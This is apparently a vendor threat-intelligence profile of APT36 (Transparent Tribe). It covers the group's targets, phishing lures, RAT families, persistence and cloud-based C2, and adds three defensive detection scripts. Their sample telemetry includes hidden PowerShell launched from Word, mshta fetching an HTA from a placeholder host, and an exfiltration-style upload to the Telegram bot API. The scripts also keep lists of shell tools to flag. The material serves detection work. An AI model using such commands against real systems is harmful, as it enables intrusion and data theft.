SOCRadar® Cyber Intelligence Inc. | Dark Web Profile: APT36
Jul 14, 2025
Jun 03, 2026
Moon

Dark Web Profile: APT36

APT36 is a Pakistan-linked state-sponsored cyber-espionage group active since at least 2013. With a persistent focus on Indian military, diplomatic, and critical infrastructure targets, APT36 conducts long-term intelligence-gathering operations using phishing, remote-access trojans, and deceptive infrastructure. Despite modest technical sophistication, the group is highly adaptive, leveraging new platforms, cloud services, and malvertising campaigns to remain effective across South Asia’s geopolitical threat landscape.

Who is APT36?

APT36, also known by aliases such as Transparent Tribe, Mythic Leopard, Earth Karkaddan, ProjectM, and COPPER FIELDSTONE (yes, it’s time we agreed on just one name), is a Pakistani state-aligned cyber-espionage group active since at least 2013. Believed to be operating on behalf of Pakistan’s military or intelligence services, the group has a long history of targeting Indian government, military, and defense-related organizations. APT36’s operations have been consistently attributed to strategic state interests, particularly concerning India and regional adversaries.

Threat actor card for APT36

Despite lacking the sophistication of top-tier APT groups, APT36 is highly persistent and adaptive. It frequently modifies its malware toolset, often using off-the-shelf RATs alongside custom-developed implants. The group’s infrastructure and attack campaigns frequently reveal operational traits tied to Pakistani time zones and network providers, and at times they leave these traces deliberately.

What are APT36’s Targets?

APT36 primarily targets Indian government bodies, defense contractors, armed forces, diplomatic missions, and research institutions. Over time, it has expanded to include India’s educational sector and aerospace industry. The Indian Computer Emergency Response Team (CERT-In), along with local authorities like the Chandigarh Police, has warned about APT36’s renewed activity in 2025 – specifically targeting Indian defense and research networks through phishing emails, fake government portals, and malicious mobile apps.

Map showing countries targeted by APT36 (created with MapChart)

Key victim categories include:

  • Primary Targets:
    • Indian military and intelligence personnel
    • Government ministries and officials
    • Aerospace and defense contractors
    • Educational and research institutions
  • Secondary Targets:
    • Afghan military and government entities
    • Pakistani dissidents and journalists (domestically monitored)
    • Opportunistic attacks in Sri Lanka, Nepal, the US, and the UK

APT36 aligns its campaigns with geopolitical developments (e.g., India-Pakistan border conflicts, terror incidents), and often crafts highly tailored lures for Indian targets, like COVID-19 health advisories, fake MFA portals, or government documents.

What are APT36’s Techniques?

Over the years, the group’s tactics have evolved from basic spear-phishing with Crimson RAT to a diversified toolkit in 2023 – 2025 that spans multiple platforms (Windows, Linux, Android) and leverages modern techniques.

APT36 Cyber Attack Lifecycle

Initial Access: Spear-Phishing, Spoofed Sites, and Malvertising

APT36’s primary entry method remains spear-phishing, often using real-world geopolitical or military events to add urgency and authenticity. Recent campaigns have weaponized documents referencing incidents like the April 2025 Pahalgam terror attack. These lures included PDFs containing links to spoofed Jammu & Kashmir Police or Indian Air Force login pages that captured credentials and initiated malware delivery.

Reflections of the India–Pakistan Kashmir Escalation on the Cyber World: Count of Dark Web mentions related to India over the years, cyber attacks, leaks, sales and more

The group also creates fake domains that mimic Indian government services, such as NIC portals and MFA services like Kavach. In some cases, they use Google Ads in malvertising campaigns to drive victims to these clone sites. Here, backdoored installers are offered to victims searching for trusted apps – leading to infection by Crimson RAT or data stealers like Limepad.

Their social engineering payloads are typically embedded in:

  • Malicious Office files with macros or OLE objects
  • Weaponized ISO or ZIP attachments
  • Deceptive PowerPoint Add-Ins (PPAM)
  • PDFs with embedded credential-stealing links

These vectors deliver the initial malware, most commonly Crimson RAT or ElizaRAT.

Execution & Payload Delivery: Expanding Arsenal of RATs and Stealers

APT36’s payloads range from legacy tools like Crimson RAT to newer, modular and cloud-integrated implants. Key malware families include:

  • Crimson RAT – Their long-used Windows RAT, offering surveillance, data exfiltration, and persistent access. Frequently delivered via Office attachments.
  • ObliqueRAT – Often deployed alongside Crimson, sometimes hidden in images or via compromised websites.
  • CapraRAT – An Android spyware implant disguised inside fake chat or social apps, capable of stealing messages, contacts, GPS data, and recordings.
  • ElizaRAT – A .NET-based RAT dropped via malicious Control Panel files (.CPL). It includes checks for geographic targeting (India Standard Time) and uses cloud-based command-and-control.
  • ApoloStealer – A second-stage Windows payload that catalogs and exfiltrates document files. Often fetched by ElizaRAT.
  • Poseidon – A Linux-focused RAT designed for use against India’s MayaOS defense deployments, delivered through trojanized apps.
  • USBWorm & USBStealer – Tools designed to spread via USB and steal files from removable drives, bridging air-gapped systems.

APT36 typically executes these payloads through methods such as LNK shortcuts, registry keys, and scheduled tasks. ElizaRAT also employs .NET packers and opens decoy content (videos, documents) during execution to distract the user.

Persistence and Defense Evasion

To maintain access:

  • Malware establishes persistence via Registry Run keys, Startup folders, or scheduled tasks.
  • Files are disguised with benign names and extensions (e.g., .jpg, Spotify.dll).
  • Many tools execute only if the system is in India’s time zone, reducing exposure.
  • Decoys like news articles or video files are opened to distract the user while malware runs.
  • Some samples create local databases (e.g., SQLite) to stage data before exfiltration.

APT36’s newer malware often remains fileless, executes in memory, and uses legitimate tools like rundll32, mshta, or COM interfaces to reduce detection.
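The persistence and evasion behaviours listed above (Run-key persistence from user-writable paths, rundll32 loading a disguised module, mshta pulling remote content) and the "Office process spawning command shells" check named in the mitigation section below are all visible in ordinary endpoint telemetry. The following triage script is an added example, not SOCRadar's code or any vendor's rule set: it runs the corresponding checks over constructed process-creation and registry-write events whose field names loosely follow Sysmon EventID 1 and 13, and every path, process and registry value in the sample set is made up for illustration.

```python
"""Triage of endpoint telemetry for the evasion and persistence tradecraft
described above: Office processes spawning shells, rundll32/mshta running
non-DLL or remote content, and Run-key persistence that points at
user-writable paths. Added example, not SOCRadar's code. The event shape
loosely follows Sysmon EventID 1 (process create) and EventID 13 (registry
value set); field names and every sample event are constructed."""
import re
from pathlib import PureWindowsPath

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe",
          "mshta.exe", "rundll32.exe"}
# Path fragments a standard user can write to: persistence launched from
# here deserves more scrutiny than from Program Files or System32.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\programdata\\")
RUN_KEY_RE = re.compile(r"\\currentversion\\(run|runonce)\\", re.IGNORECASE)
REMOTE_OR_INLINE_RE = re.compile(r"https?://|javascript:|vbscript:", re.IGNORECASE)


def basename(image: str) -> str:
    return PureWindowsPath(image).name.lower()


def in_user_writable(path: str) -> bool:
    return any(marker in path.lower() for marker in USER_WRITABLE)


def rundll32_module(cmdline: str) -> str:
    """Return the module rundll32 was asked to load: the token that follows
    the rundll32.exe token and precedes the ',EntryPoint' separator."""
    rest = re.sub(r'^"?[^"\s]*rundll32(?:\.exe)?"?\s*', "", cmdline,
                  flags=re.IGNORECASE)
    rest = rest.lstrip('"')
    return re.split(r'[,"]', rest, maxsplit=1)[0].strip()


def triage(event: dict) -> list:
    """Return the names of every rule the event trips (empty if benign)."""
    hits = []
    if event["EventID"] == 1:  # process creation
        image = basename(event["Image"])
        parent = basename(event["ParentImage"])
        cmdline = event["CommandLine"]
        if parent in OFFICE_PARENTS and image in SHELLS:
            hits.append("office_spawns_shell")
        if image == "rundll32.exe":
            module = rundll32_module(cmdline)
            # a .jpg "module" or a DLL under AppData is the disguise described above
            if not module.lower().endswith(".dll") or in_user_writable(module):
                hits.append("rundll32_suspicious_module")
        if image == "mshta.exe" and REMOTE_OR_INLINE_RE.search(cmdline):
            hits.append("mshta_remote_or_inline_script")
    elif event["EventID"] == 13:  # registry value set
        if RUN_KEY_RE.search(event["TargetObject"]) and (
                in_user_writable(event["Details"]) or in_user_writable(event["Image"])):
            hits.append("run_key_persistence_user_writable")
    return hits


def scan(events: list) -> dict:
    """Map RecordId -> rule names for every event that tripped at least one rule."""
    return {e["RecordId"]: h for e in events if (h := triage(e))}


# Constructed sample telemetry (not real events from any incident).
SAMPLE_EVENTS = [
    {"RecordId": 1, "EventID": 1,
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c powershell -w hidden -File %TEMP%\update.ps1"},
    {"RecordId": 2, "EventID": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Users\bob\AppData\Roaming\holiday.jpg,Start"},
    {"RecordId": 3, "EventID": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta.exe http://update.example.invalid/notice.hta"},
    {"RecordId": 4, "EventID": 1, "ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs -p"},
    {"RecordId": 5, "EventID": 13,
     "Image": r"C:\Users\bob\AppData\Local\Temp\setup.exe",
     "TargetObject": r"HKU\S-1-5-21-0-0-0-1001\Software\Microsoft\Windows\CurrentVersion\Run\Spotify",
     "Details": r"rundll32.exe C:\Users\bob\AppData\Roaming\Spotify.dll,DllMain"},
]

if __name__ == "__main__":
    for record_id, hits in scan(SAMPLE_EVENTS).items():
        print(record_id, hits)
```

Record 4 (a normal service host launch) produces no hit, which is the point of keying the rules on parent/child relationships and on where the module lives rather than on the binary name alone: rundll32 and mshta are legitimate Windows components, and only their unusual arguments or ancestry are worth an alert.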

Command-and-Control (C2) and Infrastructure

APT36 has moved from static C2 infrastructure to a hybrid model:

  • Early variants used attacker-controlled IPs/domains, often hosted via cheap VPS services.
  • Recent tools use Telegram bots, Slack APIs, Google Drive, and Discord for encrypted C2 and exfiltration.
  • C2 traffic is often disguised as HTTPS connections to legitimate services, evading firewall detection.
  • Some implants rotate infrastructure frequently or embed decoy IPs to mislead analysts.

Their cloud-based C2 channels allow them to blend malicious activity with normal business traffic, complicating detection.
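Because the C2 and exfiltration channels listed above ride on services that are legitimate on most networks, blocking the destination is rarely an option; what can be checked is which process on the endpoint is talking to the messaging or storage API. The detector below is an added example, not SOCRadar's code: it reads a constructed CSV of per-process web-proxy records (timestamp, host, process, destination host, URL path, method, bytes sent) and flags cloud-API traffic from any process other than the assumed desktop client or a browser, plus unusually large single uploads. The allowlist, the size threshold and every log line are assumptions to be tuned for a real environment.

```python
"""Flag cloud-messaging/storage API traffic from processes that have no
business talking to it: the hybrid C2 pattern described above. Added
example, not SOCRadar's code. The CSV log shape and every sample line are
constructed, and the client allowlist and upload threshold are assumptions."""
import csv
import io

# Services the profile names as C2/exfiltration channels, mapped to the
# desktop client that legitimately talks to each (assumed process names).
CLOUD_APIS = {
    "api.telegram.org": {"telegram.exe"},
    "slack.com": {"slack.exe"},
    "discord.com": {"discord.exe"},
    "www.googleapis.com": {"googledrivefs.exe"},
}
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe"}
LARGE_UPLOAD_BYTES = 1_000_000  # assumed threshold for a single POST

# Constructed proxy log; the bot token and webhook id are placeholders.
SAMPLE_LOG = """timestamp,host,process,dest_host,path,method,bytes_out
2025-07-14T09:12:01Z,WS-041,chrome.exe,slack.com,/api/chat.postMessage,POST,2048
2025-07-14T09:14:37Z,WS-041,rundll32.exe,api.telegram.org,/bot<TOKEN_PLACEHOLDER>/sendDocument,POST,3145728
2025-07-14T09:20:05Z,WS-017,svchost.exe,www.googleapis.com,/upload/drive/v3/files,POST,524288
2025-07-14T09:21:44Z,WS-017,slack.exe,slack.com,/api/files.upload,POST,81920
2025-07-14T09:30:12Z,WS-022,explorer.exe,discord.com,/api/webhooks/000/PLACEHOLDER,POST,4096
2025-07-14T09:31:00Z,WS-022,msedge.exe,www.example.com,/,GET,512
"""


def parse(text: str) -> list:
    """Parse the CSV text into one dict per record."""
    return list(csv.DictReader(io.StringIO(text)))


def reasons_for(row: dict) -> list:
    """Return the reasons a single record is worth an analyst's attention."""
    dest, proc = row["dest_host"].lower(), row["process"].lower()
    reasons = []
    if dest in CLOUD_APIS and proc not in CLOUD_APIS[dest] | BROWSERS:
        reasons.append("unexpected_process_to_cloud_api")
    if row["method"].upper() == "POST" and int(row["bytes_out"]) >= LARGE_UPLOAD_BYTES:
        reasons.append("large_upload")
    return reasons


def detect(text: str) -> list:
    """Run reasons_for over every record and keep the ones that fired."""
    alerts = []
    for row in parse(text):
        reasons = reasons_for(row)
        if reasons:
            alerts.append({"host": row["host"], "process": row["process"],
                           "dest_host": row["dest_host"], "reasons": reasons})
    return alerts


def hosts_with_alerts(text: str) -> list:
    """Sorted list of endpoints that produced at least one alert."""
    return sorted({a["host"] for a in detect(text)})


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

The Slack traffic from the browser and from the assumed desktop client passes, while the same API reached from rundll32, svchost or explorer does not; the size check is deliberately independent of the process check so that a large upload from an allowlisted client still surfaces for review.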

Lateral Movement and Propagation

APT36’s campaigns are often designed to minimize lateral movement, focusing instead on infecting many targets directly via phishing. However, they demonstrate capability for lateral movement through:

  • Credential harvesting and internal phishing using stolen email accounts.
  • Keylogging and browser session theft via Discord-based stealers.
  • Use of PsExec and WMI where needed to execute commands remotely.
  • USB worming to infect air-gapped or isolated networks.

They rarely exploit vulnerabilities for lateral movement, instead relying on valid credentials or social engineering.

Data Collection and Exfiltration

APT36’s ultimate goal is cyber espionage – harvesting military, political, and academic intelligence:

  • Keylogging and screenshot capture track user behavior and steal credentials.
  • ApoloStealer and other tools scan for Office files, PDFs, images, and compress or encrypt them before exfiltration.
  • Browser data and session cookies are stolen to hijack authenticated sessions.
  • Exfiltration uses Slack, Google APIs, Telegram bots, or direct HTTPS POST requests.
  • Some campaigns stage data in local SQLite databases before uploading to C2.
  • USB-based malware collects files from removable media for delayed exfiltration.

The group often sets victim identifiers and logs for tracking, ensuring operational clarity even across multiple infections.

What are the Mitigation Tactics Against APT36?

Organizations can reduce exposure to APT36 by implementing layered defenses and targeted detection strategies:

  1. Email & Attachment Controls:
    • Block macro-enabled Office files by default.
    • Use sandboxing to analyze suspicious attachments.
  2. Web Filtering & Domain Monitoring:
    • Monitor DNS queries to typosquatted government domains.
    • Block known malicious infrastructure tied to APT36.
  3. Endpoint Detection & Behavior Analysis:
    • Deploy EDR tools with anomaly-based detection (e.g., time-zone checks, Office process spawning command shells).
  4. Credential Hygiene & MFA Enforcement:
    • Rotate credentials frequently.
    • Use phishing-resistant MFA methods and verify MFA app authenticity.
  5. Cloud Service Hardening:
    • Audit use of services like Telegram, Slack, and Google Drive on enterprise endpoints.
  6. Education Sector Security Awareness:
    • Train students and staff to identify academic-themed phishing lures and malicious attachments.
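Item 2 of the list above (monitoring DNS queries for typosquatted government domains) is the one most easily turned into a standing check, because the lures described earlier reuse recognisable brand strings such as Kavach or the Indian Air Force in look-alike domains. The script below is an added example, not SOCRadar's code: it runs constructed DNS query records against a small watchlist, treating a domain as suspicious when it embeds a brand keyword without belonging to the legitimate domain, or when its registrable part is within a short edit distance of a watched domain. The watchlist, keyword list, public-suffix shortlist and every query name are assumptions or constructed samples, not statements about any real site.

```python
"""Look-alike detection over DNS query logs for the government services the
profile says APT36 impersonates. Added example, not SOCRadar's code. The
watchlist, brand keywords, public-suffix shortlist and all log lines are
constructed for illustration."""

# Assumed legitimate domains (exact or as parent of a subdomain).
WATCHLIST = ["nic.in", "gov.in", "indianairforce.nic.in"]
# Assumed brand strings whose presence outside the legitimate domain is a red flag.
BRAND_KEYWORDS = ["kavach", "indianairforce", "airforce"]
# Assumed two-label public suffixes, so registrable() keeps three labels under them.
PUBLIC_SUFFIXES = {"gov.in", "nic.in", "ac.in", "co.in"}


def levenshtein(a: str, b: str) -> int:
    """Classic edit distance (insert, delete, substitute) with a rolling row."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def registrable(domain: str) -> str:
    """The part of the name a registrant controls, e.g. www.example.com -> example.com."""
    labels = domain.lower().rstrip(".").split(".")
    keep = 3 if ".".join(labels[-2:]) in PUBLIC_SUFFIXES else 2
    return ".".join(labels[-keep:])


def is_legit(domain: str) -> bool:
    d = domain.lower().rstrip(".")
    return any(d == w or d.endswith("." + w) for w in WATCHLIST)


def classify(domain: str):
    """Return a reason string for a suspicious name, or None for a benign one."""
    if is_legit(domain):
        return None
    d = domain.lower()
    for keyword in BRAND_KEYWORDS:
        if keyword in d:
            return f"keyword:{keyword}"
    reg = registrable(d)
    for watched in WATCHLIST:
        # short names tolerate one edit, longer ones two
        limit = 1 if len(watched) <= 8 else 2
        if 0 < levenshtein(reg, watched) <= limit:
            return f"lookalike_of:{watched}"
    return None


# Constructed DNS log: "timestamp host qtype qname" per line.
SAMPLE_DNS_LOG = """2025-07-14T08:01:02Z WS-041 A mail.gov.in
2025-07-14T08:03:11Z WS-041 A kavach-app.in
2025-07-14T08:05:20Z WS-017 A indianairforce.nic.in
2025-07-14T08:06:45Z WS-017 A indianairforce-login.com
2025-07-14T08:07:01Z WS-022 A n1c.in
2025-07-14T08:09:30Z WS-022 A www.example.com
"""


def scan(log_text: str) -> list:
    """One alert dict per suspicious query, in log order."""
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        timestamp, host, _qtype, qname = line.split()
        reason = classify(qname)
        if reason:
            alerts.append({"timestamp": timestamp, "host": host,
                           "qname": qname, "reason": reason})
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_DNS_LOG):
        print(alert)
```

Legitimate subdomains such as mail.gov.in pass because the suffix check runs first; the edit-distance rule is kept conservative (one edit for short watched names) so that ordinary domains of similar length do not flood the alert list, and the brand-keyword rule catches the longer look-alikes that edit distance would miss.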

How Can SOCRadar Help?

SOCRadar offers an integrated suite of solutions tailored to defend against actors like APT36:

By leveraging SOCRadar’s unified intelligence capabilities, organizations can improve detection, response, and resilience against the threat actor’s persistent operations.

What are the MITRE ATT&CK TTPs of APT36?

| Tactic | Technique ID | Description |
| --- | --- | --- |
| Initial Access | T1566 | Spearphishing with malicious documents/links |
| Initial Access | T1190 | Drive-by compromise via infected websites |
| Initial Access | T1583/T1584 | Infrastructure acquisition (fake domains, SSL certs) |
| Defense Evasion | T1036/T1027 | Masquerading and obfuscated payloads |
| Defense Evasion | T1071 | Abuse of cloud services for C2 |
| Collection | T1005 | Data from local systems (documents, screenshots) |
| Exfiltration | T1041 | Exfiltration over encrypted C2 channels |
| Credential Access | T1555 | Credential theft via phishing/MFA impersonation |
| Persistence | T1547 | Use of registry keys, scheduled tasks, startup scripts |
| Execution | T1059 | Execution of script-based droppers (VBA, PowerShell) |
| Discovery | T1082 | System and user information gathering |
| C2 | T1105 | Ingress tool transfer and staged malware delivery |

Tools and Malware

| Malware / Tool | Description |
| --- | --- |
| Crimson RAT | Core Windows RAT used since 2013; keylogging, screenshots, full access |
| ObliqueRAT | Windows backdoor deployed via document or image lures |
| CapraRAT | Android RAT inside fake social/video apps; espionage on mobile devices |
| ElizaRAT | Modular .NET RAT with C2 via Slack, Telegram, Drive; uses CPL dropper |
| ApoloStealer | File-stealing tool; collects and stages data for upload via ElizaRAT |
| Poseidon | Linux implant used against MayaOS targets; supports remote shell, logging |
| USBWorm | Worm that spreads via USB drives to bridge air-gapped environments |
| USBStealer | Collects sensitive files from USB devices for later exfiltration |
| Limepad | Exfiltration tool used with trojanized Kavach MFA installs |
| Discord/Slack C2 | Custom malware using Discord and Slack APIs for stealthy communication |